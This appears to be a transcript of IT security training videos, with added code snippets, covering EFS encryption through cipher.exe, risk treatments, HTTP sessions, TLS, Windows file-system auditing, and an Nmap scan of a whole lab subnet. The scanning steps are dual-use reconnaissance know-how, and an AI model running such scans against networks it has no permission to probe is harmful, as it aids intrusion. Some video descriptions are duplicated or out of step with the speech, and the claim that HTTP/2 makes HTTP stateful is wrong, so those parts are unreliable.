[Video description begins] He clicks the OK button and the Certificate dialog box closes. [Video description
ends]
Here in the Windows command line, we can also use the cipher executable program to work with encrypted
files related to EFS.
[Video description begins] He opens the Select Administrator: Command Prompt window. It displays the C:\
Data\Sample_Data_Files\PHI\2017_Patients> prompt. [Video description ends]
So here, I've navigated to where those sample files are. And if I type dir, indeed, I can see the files that we
were working with.
[Video description begins] He executes the following command: dir. The output includes the following file
names: PHI-YHZ-004-0456-007.xls, PHI-YHZ-004-0456-008.xls, and PHI-YHZ-004-0456-009.xls. [Video
description ends]
And as a matter of fact, if I flip over to Windows Explorer, there is our encrypted file. It's got a 009 towards
the end of the file name.
[Video description begins] He switches to the File Explorer window and points to the PHI-YHZ-004-0456-
009.xls file. [Video description ends]
So let's go back to the Command Prompt, and indeed, we do see the 009 file, but we can't tell whether it's
encrypted or not, at least not using dir.
[Video description begins] He points to the PHI-YHZ-004-0456-009.xls file in the output. [Video description
ends]
[Video description begins] He executes the following command:cls. [Video description ends]
Now, the great thing about knowing how to do things at the command line is that you can automate this.
[Video description begins] He executes the following command: cipher. The output lists four files and indicates
whether they are encrypted or unencrypted. The file PHI-YHZ-004-0456-009.xls is encrypted and files PHI-
YHZ-004-0456-007.xls, PHI-YHZ-004-0456-008.xls, and PHI_Automation_Test.txt are unencrypted. [Video
description ends]
description ends]
What if you had to take a look at the encryption state of many different files across many servers and different
folders and, well, you could write a script pretty quickly that would do that. Here when we look at the output
of the cipher command, U means unencrypted, E means encrypted. Indeed, we can see our 009 file in fact is
encrypted.
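Here is a rough sketch of the kind of script just described, written in Python. The folder list is illustrative, and it assumes it is run on a Windows machine where EFS and cipher.exe are available:

import subprocess

folders = [r"C:\Data\Sample_Data_Files\PHI\2017_Patients"]   # add more paths as needed

for folder in folders:
    output = subprocess.run(["cipher"], cwd=folder, capture_output=True, text=True).stdout
    for line in output.splitlines():
        line = line.strip()
        # cipher prefixes each entry with U (unencrypted) or E (encrypted).
        if line.startswith("U "):
            name = line.split(maxsplit=1)[1]
            print(f"Unencrypted: {folder}\\{name}")
            # To encrypt it as part of the script, uncomment the next line:
            # subprocess.run(["cipher", "/e", name], cwd=folder)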
I could also decrypt it right here at the command line. So instead of doing it the GUI and right-clicking and
going into properties, I could also do cipher /d for decrypt and in this case, I put in the file name of that entry.
And after that, we would be on our way. So I'm going to go ahead and specify the file name, in this case, 009.
Okay, so it says decrypting it, let's just clear the screen, let's run cipher again.
[Video description begins] He executes the following command: cipher /d PHI-YHZ-004-0456-009.xls. [Video
description ends]
description ends]
And yeah, we can now see that it's got a U in front of it because now it's not encrypted, it's unencrypted.
[Video description begins] He executes the following command: cipher and in the output, he points to the PHI-
YHZ-004-0456-009.xls file, which is now unencrypted. [Video description ends]
Now let's go back into the GUI for a minute in Windows Explorer because let's say, I right-click on the folder
containing those sample files and go into Properties, go into Advanced. Well, I've already flagged encryption
at the folder level.
[Video description begins] He right-clicks the 2017_Patients folder in the first part of the File Explorer
window. A shortcut menu appears. He selects the Properties option and the 2017_Patients Properties dialog
box opens. It includes General, Sharing, and Security tabs. Under the General tab, he clicks the Advanced
button and the Advanced Attributes dialog box opens. It contains two sections, Archive and Index attributes
and Compress or Encrypt attributes and OK and Cancel buttons. The Archive and Index attributes section
contains two checkboxes, Folder is ready for archiving and Allow files in this folder to have contents indexed
in addition to file properties. Both the checkboxes are checked. The Compress or Encrypt attributes section
contains two checkboxes, Compress contents to save disk space and Encrypt contents to secure data and
Details button. The Encrypt contents to secure data checkbox is checked. [Video description ends]
Now when you do that initially, it'll ask you if you want to encrypt what is already in the folder. But in the
future, newly added files should be encrypted automatically. Let's see if that is true.
[Video description begins] He clicks the Cancel button and the Advanced Attributes dialog box closes. He
clicks the Cancel button and the 2017_Patients Properties dialog box closes. [Video description ends]
I'm going to right-click here in this folder and create a new file called new. And I can tell already, it's
encrypted, we can see the little gold padlock icon.
[Video description begins] He right-clicks and a menu appears. He hovers over the New option and a flyout
menu appears. He clicks the Text Document option from the flyout menu and a text box appears. He names it
new. [Video description ends]
And of course, we could verify this at the command line by simply typing, cipher. And indeed, our new
encrypted file is listed.
[Video description begins] He switches to the Administrator: Command Prompt window and executes the
following command: cipher. In the output, he points to the new.txt file which is encrypted. [Video description
ends]
Objectives
[Video description begins] Topic title: Exercise: Session Management and Encryption. The presenter is Dan
Lachance. [Video description ends]
In this exercise, you will first describe three common risk treatments related to risk management, and provide
an example of each. After that, you'll describe HTTP session management. Next, you'll explain how encrypting
files on many servers using Microsoft Encrypting File System, or EFS, can be automated. Finally, the last
thing you'll do is explain the relationship between PKI certificates and SSL/TLS. Pause the video, think about
these things carefully, and then come back to view the solutions.
In risk management there are a number of different risk treatments, ways to manage that risk. One of which is
risk mitigation. Risk mitigation would apply when you implement a security control to either reduce, or
eliminate, the risk. Such as putting a firewall in place to reduce the risk of incoming malicious traffic initiated
from outside the network. Risk avoidance is another risk treatment. What this means is that we do not partake
in a specific activity because the risk is too high compared to the possible rewards. So we completely avoid it
in the first place.
Risk transfer means you are outsourcing the risk to a third-party, and one way that happens is through
insurance, such as cyber liability insurance. For example, if you deal with customer data and that data
is hacked, and people's sensitive information is then used for identity theft and so on, you could pay a monthly
premium and transfer that type of risk to a cyber liability insurance company.
HTTP is generally a stateless protocol. Certainly that is true with HTTP 1.0. After the web browser sends an
HTTP request to the server and the server fulfills it, that is it; the session is done. The next time that same
browser sends a request, it looks like a whole new connection from the server's perspective, unless something
like HTTP 2 is in use.
So HTTP is the HyperText Transfer Protocol, and we know that version 1 is considered stateless. To deal with
that, we have things like web browser cookies to retain information between connections from the browser to
the server. And that cookie might contain sensitive information like a session ID or some kind of security
token that authorizes the user to use a secured website.
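For example, a simplified exchange might look like the following, where the host name and cookie value are purely hypothetical. After a successful login, the server sets the session cookie in its response, and the browser then replays it on later requests:

HTTP/1.1 200 OK
Set-Cookie: SESSIONID=8f3a2c71d9; Secure; HttpOnly

GET /account HTTP/1.1
Host: app.example.com
Cookie: SESSIONID=8f3a2c71d9

The Secure and HttpOnly flags limit the cookie to HTTPS connections and keep it away from client-side scripts, which helps protect that session ID from being stolen.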
[Video description begins] Communication stops upon HTTP transaction completion. [Video description ends]
So the cookie data, like a session ID, can be transmitted to the web server on future connections without the
user having to authenticate again, as long as the session hasn't yet timed out. How can we automate EFS file encryption?
We can use the GUI and right-click on files and folders and go into the properties to enable encryption. But
otherwise, we could automate this by building a script. And that script, among other things, would use the
cipher.exe command that is built into Windows OS's that support EFS.
Now the cipher command by itself will simply list the files and directories in the current location, preceded
by either a U if the entry is unencrypted or an E if it's encrypted. To encrypt something from our script, we
can run cipher /e for encrypt and then specify what needs to be encrypted, such as a file name. And, inversely,
we can decrypt using cipher /d. The thing to watch out for
though is if you're going to do this across a bunch of machines, understand that EFS encryption encrypts the
file for the user that is logged on doing the encryption.
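As a rough sketch of what such a script might contain, using only the built-in cipher.exe (the folder path is simply the sample folder from the earlier demo and would differ per server):

rem encrypt-phi.cmd - run as the account that should hold the EFS keys
rem /e encrypts; /s: applies the operation to the folder and all subfolders
cipher /e /s:C:\2017_Patients

rem Verify: listing the folder shows E for encrypted entries, U for unencrypted
cipher C:\2017_Patients

rem To reverse the change later, decrypt with /d:
rem cipher /d /s:C:\2017_Patients

A script like this could then be pushed to each server with whatever remote execution or scheduling tool is already in use.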
So, you can add other parties that should have the ability to decrypt, but this is the default behavior, so just
bear it in mind. The next thing we'll do is distinguish between, and describe the relationship among, PKI,
SSL, and TLS. PKI, or public key infrastructure, is really a hierarchy of digital security certificates that are
issued to users, devices, or even software applications. Among other things, the certificate contains a public
key and possibly a mathematically related private key. These are used for encryption and decryption and the
creation of digital signatures, and all that great stuff that secures a connection over the network.
Now SSL is a security protocol. So when people say SSL certificate, it's almost a misnomer: a PKI certificate
can be used for SSL or TLS, or both at the same time, so technically we don't want to call it an SSL or a TLS
certificate. SSL itself is considered vulnerable and deprecated, so we should try not to use it if we don't have
to. TLS, or Transport Layer Security, supersedes SSL. You don't want to use TLS 1.0 either, because it has
known vulnerabilities; if you can help it, don't use it, and try to use version 1.2 or above. Again, TLS is a
security protocol where, for example, a web browser connecting to a server will negotiate the highest level of
TLS that is supported by both ends to deal with key exchange and so on.
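One way to observe that negotiation, assuming an OpenSSL client is available and you have permission to test the host (the host name here is only a placeholder), is to force a handshake at a specific protocol version:

# Handshake using only TLS 1.2; the output shows the negotiated protocol,
# the cipher suite, and the server's PKI certificate chain
openssl s_client -connect www.example.com:443 -tls1_2

# The same probe with -tls1 (where the OpenSSL build still supports it)
# quickly confirms whether the server refuses the deprecated TLS 1.0
openssl s_client -connect www.example.com:443 -tls1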
Table of Contents
No Objective Provided
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance, an IT
Consultant and Trainer. [Video description ends]
Dan Lachance has worked in various IT roles since 1993, including as a technical trainer with Global
Knowledge, a programmer and consultant, and an IT tech author and editor for McGraw-Hill and Wiley
publishing. He has held and still holds certifications in Linux, Novell, Lotus, CompTIA, and Microsoft. His
specialities over the years have included networking, IT security, cloud solutions, Linux management, and
configuration and troubleshooting across a wide array of Microsoft products. Most end users have a general
sense of IT security concepts.
But today's IT systems are growing ever larger and more complex. So now more than ever, it's imperative to
have a clear understanding of what digital assets are and how to deal with security threats and vulnerabilities.
Users need to acquire the skills and knowledge to apply security mitigations at the organizational level. In this
course, Dan Lachance will use selective auditing to provide valuable insights into activity on a network. He'll
also cover how incident response plans are proactive measures used to deal with negative events. Specifically,
learners will explore how to apply IT security skills to enable asset usage auditing and create incident
response plans.
After completing this video, you will be able to list best practices related to IT security auditing.
Objectives
Periodic security audits can ensure that IT systems, business processes, and data are protected properly and
that privileges are not being abused.
So we can track resource usage, where resources could be things like files, databases, applications, secured
devices, user accounts, and even changes made to privileges for access to these resources. There are usually a
number of driving factors that will push an organization toward conducting periodic security audits.
One of which is legal and regulatory compliance. For example, to remain in compliance with HIPAA
regulations related to protection of sensitive medical information, certain types of security controls need to be
in place. And this can be determined through conducting periodic security audits. And the same thing would be
true for other bodies like PCI DSS, which is used for merchants that work with cardholder data, the proper
protection of that type of sensitive information.
Another driving factor would be to ensure continued customer confidence in the organization. We should also
establish an annual security baseline because if we don't do that when we periodically conduct a security audit,
we might not know what is secure or what is not, compared to what is normal within the specific organization.
Also, we can use auditing to measure incident response effectiveness as we audit how incidents are dealt with.
Some best practices relating to auditing begin with understanding that the unique organization has specific
business and security needs that will be different from other organizations. And so as a result, the security
policies will be unique. We should only audit security principals of interest. A security principal is a user, a
group, a device, or a piece of software. We don't want to enable auditing of, for example, access to every file
on every file server for every user. We want to be a little bit more specific than that. We also want to audit only relevant
events, such as the success of accessing a restricted database, or perhaps only auditing the failure of an attempt
to access a secure database.
So what we're talking about doing here is avoiding audit message fatigue. If you audit too much, you'll be
receiving too many audit message alerts and then it begins to lose its meaning. We should also make sure that
audit logs that retain audit events themselves are protected. They should have auditing and access control
mechanisms applied. They should also be encrypted. We should store an additional copy of audit logs away
from the device that is itself being audited, in case it gets compromised. We should always ensure users have a
unique log on account because if we don't, then we don't have a way for users to be accountable for the use of
that account. And auditing always requires continuous centralized monitoring because we want to make sure
that over time, our security processes and controls are still effective.
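As one concrete way of keeping that additional copy of audit logs away from the audited device, Windows can export a log from an elevated command prompt; a minimal sketch, assuming a reachable file share (the share path here is hypothetical):

rem Export the Security log to a remote share for safekeeping
wevtutil epl Security \\logserver\auditlogs\server01-security.evtx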
Auditing also includes conducting periodic scans, such as vulnerability scanning of either a host or a network
to identify weaknesses, such as ports that are open that shouldn't be or missing software patches. Penetration
testing is a little bit different because instead of simply identifying vulnerabilities there is an attempt to exploit
those vulnerabilities. And this is done so that we can determine the security posture of an organization. But the
thing about penetration testing is that it's not passive like vulnerability scanning. It can actually render systems
unstable or even unusable if a vulnerability is successfully exploited by the pen testing team.
So we have to make sure ahead of time, that when a pen test is going to be conducted against an organization,
that there are specific times of day that are set aside for this. And that non-disclosure agreements or NDAs are
also signed by the pen testers because they might gain access to very sensitive information as they run
penetration tests. We should also determine whether an internal or an external security auditing team should
be used. To remain compliant, some regulations might require that a third party or a set of external auditors
conduct the audit. There are a few types of security audits that can be conducted by
security IT teams, one of which is the Black Box test.
This means that no implementation details are provided to the pen test team. And so therefore, only public data
is available to them to determine which systems are in use, which versions, and how it's been implemented. So
this is really the best gauge of real attacks from the outside, when attackers would have no access to internal
information. Another type of audit or test is a White Box test, where internal implementation details are
provided. So this is the same type of knowledge that employees might have. And we all know that sometimes,
security breaches are the result of insider jobs. So it's also important to conduct this type of test periodically as
well.
And certainly, it would be more thorough than a Black Box test because of the amount of knowledge that
would be available to the pen testers. Knowledge of internal systems and processes, even software
development and code review practices used by the specific organization. Finally, we've also got Grey Box
testing where only some implementation details are provided to the pen test team. It could be things like
network documentation or organizational security policies, maybe only a subset of those policies. So this is a
good representation of what social engineering attackers might learn by tricking users into divulging
some information.
In this video, you will enable file system auditing using Group Policy.
Objectives
[Video description begins] Topic title: Enable Windows File System Auditing. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll use Windows Server 2016 to enable Windows File System Auditing. File System
Auditing allows us to track access to a given file. Whether the people are opening the file, or attempting to
open the file, or attempting to delete it and so on. To get started here on my server, I'm going to go to my Start
menu and fire up the Active Directory Users and Computers tool. This server is an Active Directory domain
controller. And so we're going to take a quick peek at any user accounts that might be available or security
principals that we want to audit.
[Video description begins] The Active Directory Users and Computers window opens. It is divided into four
parts. The first part is the menu bar. The second part is the toolbar. The third part is the Active Directory
Users and Computers pane. It contains the Saved Queries and fakedomain1.local root nodes. The
fakedomain1.local root node includes the LasVegas subnode, which further contains the Computers, Groups,
and Users subnodes. The Users subnode is selected. The fourth part is the content pane. It contains a table.
This table has the column headers: Name, Type, and Description. The Name column header has the value,
User One. The Type column header has the value, User. The Description column has no value. [Video
description ends]
Here I've got a user called User One, so that is the account whose access to a specific file in the file system
I'm going to audit.
[Video description begins] He selects the User One value in the Name column header. [Video description
ends]
Now let's switch to the file system on that same server, although it doesn't have to be the same server; it could
be just another server joined to the domain.
[Video description begins] He opens the File Explorer window. It is divided into four parts. The first part is
the menu bar. The second part includes the address bar. The third part displays a list of drives and folders.
The fourth part displays the contents of the drive or folder selected in the third part. The Local Disk (C:) drive
is selected in the third part. The fourth part includes the Projects folder. [Video description ends]
But I've got a file location here on Drive C called Projects. It's a folder in which there are three sample files.
[Video description begins] He opens the Projects folder given in the fourth part. It contains three files, named
Project_A.txt, Project_B.txt, and Project_C.txt. [Video description ends]
What I want to do is enable auditing of user one's access to the Projects folder here on the server.
[Video description begins] He switches back to the list of contents displayed in the fourth part. He closes the
File Explorer window. [Video description ends]
The first thing we need to do is to turn on the option for auditing file systems. And that is done through group
policies. So on my server, I'll fire up my menu and go into the Group Policy Management tool.
[Video description begins] The Group Policy Management window opens. It is divided into four parts. The
first part is the menu bar. The second part is the toolbar. The third part contains the Group Policy
Management root node. It contains the Forest: fakedomain1.local subnode. It includes the Domains subnode.
This subnode contains the fakedomain1.local subnode, which further includes the Default Domain Policy,
Admins, Boston, and LasVegas subnodes. The Default Domain Policy subnode is selected. The fourth part
contains the Default Domain Policy page. It contains the Scope, Details, Settings, and Delegation tabs and
three sections. The first section is Links. The second section is Security Filtering. The third section is WMI
Filtering. [Video description ends]
I want this applied at the entire Active Directory domain level. So I'm going to go ahead and right-click
Default Domain Policy, that is there automatically, and I'll choose Edit.
[Video description begins] The Group Policy Management Editor window opens. It is divided into four parts.
The first part is the menu bar. The second part is the toolbar. The third part includes the Computer
Configuration and User Configuration root nodes. The Computer Configuration root node contains the
Policies and Preferences subnodes. The User Configuration root node also contains the Policies and
Preferences subnodes. The fourth part displays the information of the selected node in the third part. [Video
description ends]
Now because auditing is a security item we're going to find that most security items in group policy exist under
Computer Configuration and not under User Configuration. So under Computer Configuration, I'm going to go
ahead and expand Policies. Then I need to drill down under Windows Settings and then Security Settings. And
then finally, I've got my audit policy information listed down at the bottom.
[Video description begins] He expands the Policies subnode. This subnode includes the Windows Settings
subnode. He expands this subnode. It includes the Security Settings subnode. He expands this subnode. It
includes the Advanced Audit Policy Configuration subnode. He expands this subnode. It contains the Audit
Policies subnode. He expands this subnode. It includes the Object Access subnode. He selects this subnode.
The fourth part displays a table with the column headers: Subcategory and Audit Events. [Video description
ends]
[Video description begins] He highlights the row entry: Subcategory: Audit File System and Audit Events: Not
Configured. [Video description ends]
Then on the right, I can see I have the ability to audit the file system as well as the file shares, shared folders.
[Video description begins] He highlights the row entry: Subcategory: Audit File Share and Audit Events: Not
Configured. [Video description ends]
But I'm interested in the file system. I'm going to double-click on that and I'm going to turn on the check
mark to configure audit events for both success and failure.
[Video description begins] The Audit File System Properties dialog box opens. It includes the Policy tab and
the OK button. The Policy tab includes the Configure the following audit events: checkbox. The Success and
Failure checkboxes are given below this checkbox. These are disabled. [Video description ends]
Maybe you want to audit when people successfully open project files or maybe you only want to audit when
people try to, but it fails, or maybe both as in my case.
[Video description begins] He selects the Configure the following audit events: checkbox. The Success and
Failure checkboxes get enabled. He selects these checkboxes. [Video description ends]
[Video description begins] He clicks the OK button and the Audit File System Properties dialog box
closes. [Video description ends]
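As an aside, on a single machine the same subcategory can be checked or set from an elevated command prompt with auditpol; a minimal sketch (the domain-level Group Policy we're configuring here takes precedence where it applies):

rem Show the current audit setting for the File System subcategory
auditpol /get /subcategory:"File System"

rem Enable success and failure auditing for that subcategory locally
auditpol /set /subcategory:"File System" /success:enable /failure:enable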
The next thing I need to do is to go back into the file system to configure auditing further. So here is the
Projects folder that we were talking about.
[Video description begins] He switches to the File Explorer window. [Video description ends]
So I've turned on the overall potential for auditing. But I'm not yet auditing the Projects folder. To do that I
need to right-click on that folder. The same step would apply to an individual file that you want to audit too.
I've right-clicked on the folder, I'm going to go into the Properties, going to go under Security.
[Video description begins] The Project Properties dialog box opens. It includes the Security tab. [Video
description ends]
Then I'll click the Advanced button and then I'll click the Auditing tab.
[Video description begins] The Advanced Security Settings for Projects window opens. It includes the Auditing
tab. [Video description ends]
We can see down below that currently nobody is being audited, at least for this folder, Projects.
[Video description begins] He clicks the Auditing tab. It displays a table with the column headers: Type,
Principal, Access, Inherited from, and Applies to and the Add button. These column headers are empty. [Video
description ends]
[Video description begins] The Auditing Entry for Projects window opens. It includes the Select a principal
link, Type and Applies to drop-down list boxes, the Full control, Modify, Read & execute, List folder contents,
Read, Write, and Special permissions checkboxes, and the OK button. The Type and Applies to drop-down list
boxes and the Full control, Modify, Read & execute, List folder contents, Read, Write, and Special permissions
checkboxes are disabled. The Read & execute, List folder contents, and Read checkboxes are selected. [Video
description ends]
And I'm going to click Select a principal, which in this case is going to be my user uone, user one.
[Video description begins] The Select User, Computer, Service Account, or Group dialog box opens. It
includes the Enter the object name to select (examples): text box and the Check Names button. This button is
disabled. [Video description ends]
Now we could also specify a group and so on. I can determine if I want to audit the success or failure or all
types of events.
[Video description begins] He types uone in the Enter the object name to select (examples): text box. The
Check Names button gets enabled. He clicks this button. The uone text changes to User One
([email protected]). He then clicks the OK button, and the dialog box closes. The Type and Applies to
drop-down list boxes and the Full control, Modify, Read & execute, List folder contents, Read, and Write
checkboxes get enabled. [Video description ends]
[Video description begins] He selects the All value in the Type drop-down list box. [Video description ends]
And I don't care if it applies to the folder, subfolders or files within it, but I want to start in the file system
hierarchy at the Projects folder. And maybe I'm interested in checking out the use of Read & execute, List
folder contents, Read, and also let's say maybe even Write.
[Video description begins] He selects the Write checkbox. [Video description ends]
So I've got this now set up, I'm going to click OK. There is my user principal that I'm auditing for the Projects
folder UOne.
[Video description begins] The column headers: Type, Principal, Access, Inherited from, and Applies to, in the
Advanced Security Settings for Projects window get populated with the All, User One
([email protected]), Read, write & execute, None, and This folder, subfolders and files values,
respectively. [Video description ends]
[Video description begins] The Advanced Security Settings for Projects window closes. [Video description
ends]
So to test this I'm going to connect as user one to the Projects folder and try to access something because that
should trigger events to be written to this server's security log.
[Video description begins] The Projects Properties dialog box closes. [Video description ends]
Before I test this I'm just going to share out this Projects folder on the network.
[Video description begins] He right-clicks the Projects folder and selects the Properties option. The Projects
Properties dialog box opens. [Video description ends]
So I'm going to right-click, go into the Properties, go into Sharing and I'll click Advanced Sharing.
[Video description begins] He clicks the Sharing tab. It includes the Advanced Sharing button. [Video
description ends]
[Video description begins] He clicks the Advanced Sharing button. The Advanced Sharing dialog box opens. It
includes the Share this folder checkbox and the Permissions and OK buttons. The Share this folder checkbox is
selected. [Video description ends]
And for the permissions, if I click Permissions, we can see everyone has got at least Read, so I'll just add Read
and Change.
[Video description begins] He hovers over the Share this folder checkbox. [Video description ends]
And of course I can also specify further permissions or less permissions for specific files in that folder.
[Video description begins] The Permissions for Projects dialog box opens. It includes a table with the column
headers: Permissions for Everyone, Allow, and Deny. The Permissions for Everyone column header has the
values: Full Control, Change, and Read. The Allow and Deny column headers have three checkboxes. The
checkbox in the Allow column header for the Read value in the Permissions for Everyone column header is
selected. [Video description ends]
I could go into Security for it and determine the permissions that are assigned at the individual NTFS file level.
[Video description begins] He closes the Permissions for Projects dialog box. [Video description ends]
And remember that when you combine shared folder permissions with NTFS file system permissions, the most restrictive applies.
[Video description begins] He closes the Projects Properties dialog box and opens the Projects folder. [Video
description ends]
From a Windows 10 station, I'm going to try to connect to the UNC path of that host, double backslash.
[Video description begins] The Project_A.txt Properties dialog box opens. It includes the Security tab and the
Cancel button. [Video description ends]
I know the IP address and I know that the folder here is called Projects.
[Video description begins] He clicks the Security tab. It includes the Group or user names list box and a table.
The Group or user names: text box includes the Users (FAKEDOMAIN1\Users) value. He selects this value.
The table shows the column headers: Permissions for Users, Allow, and Deny. The Permissions for Users
column header has the values: Full Control, Modify, Read & Execute, Read, Write, and Special permissions.
The Allow column has two tick marks for the Read & Execute and Read values in the Permissions for Users
column header. The Deny column has no value. [Video description ends]
[Video description begins] He hovers over the tick marks. [Video description ends]
So the domain is fakedomain1\, the user name is uone and I'll pop in the password for that account.
[Video description begins] He clicks the Cancel button and the Project_A.txt Properties dialog box
closes. [Video description ends]
[Video description begins] He opens another File Explorer window. [Video description ends]
[Video description begins] He types \\192.168.0.231\projects in the address bar and presses the Enter key. The
Windows Security dialog box opens. It includes the User name and Password text boxes and the OK button.
He types fakedomain1\uone in the User name text box and password in the Password text box. He then clicks
the OK button to close the dialog box. [Video description ends]
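As a side note, the same connection could be made from a command prompt on the Windows 10 station with net use, reusing the server IP, share name, and account shown above (the drive letter is arbitrary):

rem Map the shared folder as UOne; the trailing * prompts for the password
net use X: \\192.168.0.231\projects /user:fakedomain1\uone *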
And we can see indeed that the Project_A.txt file, which only contains sample text, has actually been opened
up.
[Video description begins] He switches back to the previous File Explorer window. He opens the Project_A.txt
file. [Video description ends]
So we've gone ahead and accessed that file. Now bear in mind, in order for this to trigger the audit event to be
written to the security log of the server, group policy needs to have been refreshed on affected machines, such
as on the server that we are auditing. That refresh should happen automatically on the server.
[Video description begins] He switches back to the File Explorer window. [Video description ends]
But if you're actually testing this and it's not working, and you've done the configuration very quickly, you
might want to go into a Command Prompt on the server and then force a Group Policy refresh such as
gpupdate /force.
[Video description begins] He clicks the Start menu and types cmd. The Command Prompt option appears. He
selects this option. The Administrator: Command Prompt window opens. The C:\Users\Administrator> prompt
is displayed. [Video description ends]
And if you see messages like Computer Policy update has completed successfully and User Policy update has
completed successfully, you know you're good on the server that you've configured to audit.
[Video description begins] He executes the gpupdate /force command. The C:\Users\Administrator> prompt is
displayed. [Video description ends]
Because the computer policy, as you recall, when we were configuring it, is where we drilled down into the
security section to configure the auditing. So on the server that has the file system that I'm auditing, I'm going
to go ahead and take a look at the Event Viewer. So, from the Start menu, I'll start typing its name, and I'll go
into the Event Viewer.
[Video description begins] He clicks the Start menu and types eve. The Event Viewer option appears. He
selects this option. The Event Viewer window opens. It is divided into five parts. The first part is the menu bar.
The second part is the toolbar. The third part is the Event Viewer (Local) pane. It includes the Custom Views
and Windows Logs root nodes. The fourth part is the content pane. It displays the information of the node
selected in the Event Viewer (Local) pane. The fifth part is the Actions pane. [Video description ends]
What I want to do is drill down on the left under Windows Logs and select the Security log.
[Video description begins] He expands the Windows Logs root node. It includes the Security option. [Video
description ends]
[Video description begins] He selects the Security option. The Security page opens in the content pane. It is
divided into two parts. The first part includes a table with the column headers: Keywords, Date and Time,
Source, Event ID, and Task Category. The second part includes the General tab. [Video description ends]
And over on the right, I can either search or I can see I've got an audit message listed here for
FAKEDOMAIN1\UOne.
[Video description begins] He selects the row entry: Keywords: Audit Success, Date and Time: 1/8/2019
10:14:29 AM, Source: Microsoft Windows security, Event ID: 4656, and Task Category: File System. The
General tab includes Security ID: FAKEDOMAIN1\UOne and Object Name: C:\Projects\
Project_A.txt. [Video description ends]
[Video description begins] He highlights UOne in Security ID: FAKEDOMAIN1\UOne. [Video description
ends]
And it looks like that user read a file here called Project A.txt.
[Video description begins] He highlights Project_A.txt in the Object Name: C:\Projects\Project_A.txt. [Video
description ends]
And of course, we can see the date and time stamp that goes along with that audit event.
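If you prefer the command line to scrolling through Event Viewer, the Security log can also be queried for the object access event IDs involved here (4656 is the handle request we just saw; 4663 records the actual access); a sketch using the built-in wevtutil, run from an elevated prompt:

rem Show the 10 most recent object access audit events, newest first, as text
wevtutil qe Security /q:"*[System[(EventID=4656 or EventID=4663)]]" /c:10 /rd:true /f:text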
Find out how to scan hosts for security weaknesses from a Windows computer.
Objectives
[Video description begins] Topic title: Conduct a Vulnerability Assessment Using Windows. The presenter is
Dan Lachance. [Video description ends]
In this demonstration, I'll conduct a network vulnerability scan from a Windows 10 station. The problem is that
Windows 10 does not include a vulnerability scanner by default within the operating system. But that is okay
because we can go and download the free Nmap tool, which I've already done. So I'm going to go to my Start
menu, type in nmap, and there it is: the Zenmap tool, the front-end GUI that comes with Nmap.
[Video description begins] The Zenmap window opens. It is divided into four parts. The first part is the menu
bar. The second part contains the Target combo box, the Profile drop-down list box, Command text box, and
the Scan and Cancel buttons. The Intense scan value is selected in the Profile drop-down list box. The
Command text box has the command, nmap -T4 -A -v. The third part contains the Hosts and Services buttons
and the OS and Host column headers. The fourth part contains the Nmap Output, Ports / Hosts, Topology,
Host Details, and Scans tabs. The Nmap Output tab is selected. It displays a drop-down list box and the
Details button. These are disabled. [Video description ends]
I'm going to go ahead and click on that, and the first thing I have to do is determine what the target is. Am I
trying to scan a single host for vulnerabilities, a subset of hosts, or the entire subnet? In this case, I'm going to
put in 192.168.0, which is my network, and then .1-254. I want to scan all host IP addresses on the 192.168.0
subnet.
[Video description begins] He types 192.168.0.1-254 in the Target combo box. The command in the Command
text box changes to nmap -T4 -A -v 192.168.0.1-254. [Video description ends]
Then I have to determine the scanning profile I'm going to use. Do I want to perform an intense scan which
would take longer than a quick scan?
[Video description begins] He clicks the Profile drop-down list box. A list of options appears. It includes the
Quick scan option. [Video description ends]
And notice when I choose a different profile it's going to be modifying the Nmap command that is going to be
executed.
[Video description begins] He hovers over the nmap -T4 -A -v 192.168.0.1-254 command in the Command text
box. [Video description ends]
[Video description begins] He selects the Quick Scan option. The nmap -T4 -A -v 192.168.0.1-254 command in
the Command text box changes to nmap -T4 -F 192.168.0.1-254. [Video description ends]
And if you are familiar with Nmap command line syntax already, then you can go ahead and pop it in here.
And it will take it as you execute or run the scan, which we do by clicking the Scan button in the upper-right,
which I'll do now.
[Video description begins] He clicks the Scan button. The output appears in the Nmap Output tab. The Host
column header includes the hosts: 192.168.0.1, 192.168.0.2, 192.168.0.3, 192.168.0.5, 192.168.0.6, and
192.168.0.7. The output displays the details of each host in a separate section. [Video description ends]
And after a moment, in the left-hand navigator, we can see it's discovered a number of hosts that are up and
running on the subnet.
[Video description begins] He selects the 192.168.0.2, 192.168.0.3, 192.168.0.5, 192.168.0.6, and 192.168.0.7
hosts. [Video description ends]
On the right, we can also see the Nmap Output where each host is separated with a blank line.
[Video description begins] He highlights 192.168.0.1 in the output line: Nmap scan report for
192.168.0.1. [Video description ends]
We've got sections for each host that list things like the IP address of the host and port information, such as
whether the port is open and listening.
[Video description begins] He highlights the entries of the table displayed in the details of 192.168.0.1 in the
output. This table has three column headers: PORT, STATE, and SERVICE. The entries in the first row are:
53/tcp, open, and domain, respectively. The entries in the second row are: 80/tcp, open, and http, respectively.
The entries in the third row are: 443/tcp, open, and https, respectively. The entries in the fourth row are:
5000/tcp, open, and upnp, respectively. [Video description ends]
Or whether it's filtered which normally means that it's being blocked by a firewall rule.
[Video description begins] He highlights filtered in the output line: 8081/tcp filtered blackice-icecap. [Video
description ends]
We can also see the hardware or the MAC Address of the device and on the left, I can also click on Services
and view things from this perspective.
[Video description begins] He highlights 2C:99:24:5A:17:C0 in the output line: MAC Address:
2C:99:24:5A:17:C0 (Arris Group). [Video description ends]
For example, I want to see all the jetdirect network printers out there.
[Video description begins] He clicks the Service button. The Service pane opens. It includes the afp, blackice-
icecap, dc, domain, http, http-proxy, https, ida-agent, jetdirect, and microsoft-ds. [Video description ends]
So I can click jetdirect and I can see the IP here listening on TCP port 9100, which is normal for network
printing.
[Video description begins] He clicks the jetdirect service. The Port / Hosts tab in the fourth part shows a table
with the column headers: Hostname, Port, Protocol, State, and Version. The Hostname column header has the
value, 192.168.0.5. The Port column header has the value, 9100. The Protocol column header has the value,
tcp. The State column header has the value, open. The Version column header has no value. [Video description
ends]
And maybe I want to look for web servers so I could click on http.
[Video description begins] He clicks the http service. The Port / Hosts tab in the fourth part shows a table with
the column headers: Hostname, Port, Protocol, State, and Version. The Hostname column header has the
values, 192.168.0.1, 192.168.0.3, 192.168.0.5, 192.168.0.6, and 192.168.0.13. The Port column header has the
value, 80, for each row. The Protocol column header has the value, tcp, for each row. The State column
header has the value, open, for each row. The Version column header has no value. [Video description ends]
Maybe there is only supposed to be one on the network, but here I see five listed. And this is one of the reasons
